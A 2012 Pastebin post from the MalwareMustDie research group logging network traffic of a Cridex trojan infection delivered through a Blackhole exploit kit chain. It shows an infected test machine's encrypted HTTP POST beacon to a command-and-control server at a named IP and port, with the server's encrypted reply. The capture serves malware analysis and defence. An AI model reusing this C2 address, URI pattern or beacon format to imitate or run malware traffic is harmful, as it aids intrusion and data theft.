Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ===========================================
- MalwareMustDie - Cridex Network analysis
- Facebook --> PluginDetect 0.7.9 --> BHEK2
- @unixfreaxjp - Sun, 25 Nov 2012 15:20:20 GMT
- ===========================================
- // TestPC ---> 180.235.150.72 HTTP-POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 180.235.150.72:8080
- Content-Length: 347
- Connection: Keep-Alive
- Cache-Control: no-cache
- .....T*K..N..t...H......I:...{....X{.C..l.?su.{.N....29..%.....<v..S..
- z..-D/...y. 7.J0.!>...i..Z..K....}....k.9.i|....IGJ....H..e
- ...',.H.%..$..Y6....t..J..j....NSpb3p...:..J.....B?..v.)....C.]c.J+.o.
- ..~..I&]6pf.Z....:...K....'y}EC....J.I<2.5..O..KX,u-R..k..f.i2..#KZg."
- ..2..G\..~5"|..B...e........A.O..N..ic4..0...I......C.....UG..m..g.vt+
- /.nw,l.HTTP/1.1 200 OK
- // Receiving a long response below:
- Server: nginx/1.0.10
- Date: Sun, 25 Nov 2012 13:39:39 GMT
- Content-Type: text/html; charset=UTF-8
- Transfer-Encoding: chunked
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- f3b
- /..PS..~:Pk1.$...|a8......$....S.yb....p......d.VR..+P....... .P*.&+.i
- .d..>.....tM.c.B+..W..^.2.......X..qr.|I.zY`0N.{.O.WU...4,.9..^kK
- 2U...`........p..N..v...:O\dy.:.W.b."...]..Y...0.l.......m%.).=..N=..
- :
- long one...
- :
- zL..!..B............7..PS3..x...}.Q.s.4Ntm5K;t~p..0.....2%../*...Cd.J.
- ...!D..5Q8...'E>-..5.*A...B6.h..=X.z.Y......[..;-....vm.h.aN.RX.(V...!
- ..@a....M.@.+.ji.....C..U.S.e_...^......g?.<..-..^.xe.....`........%..
- Z.2..../.
- 0
- // #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement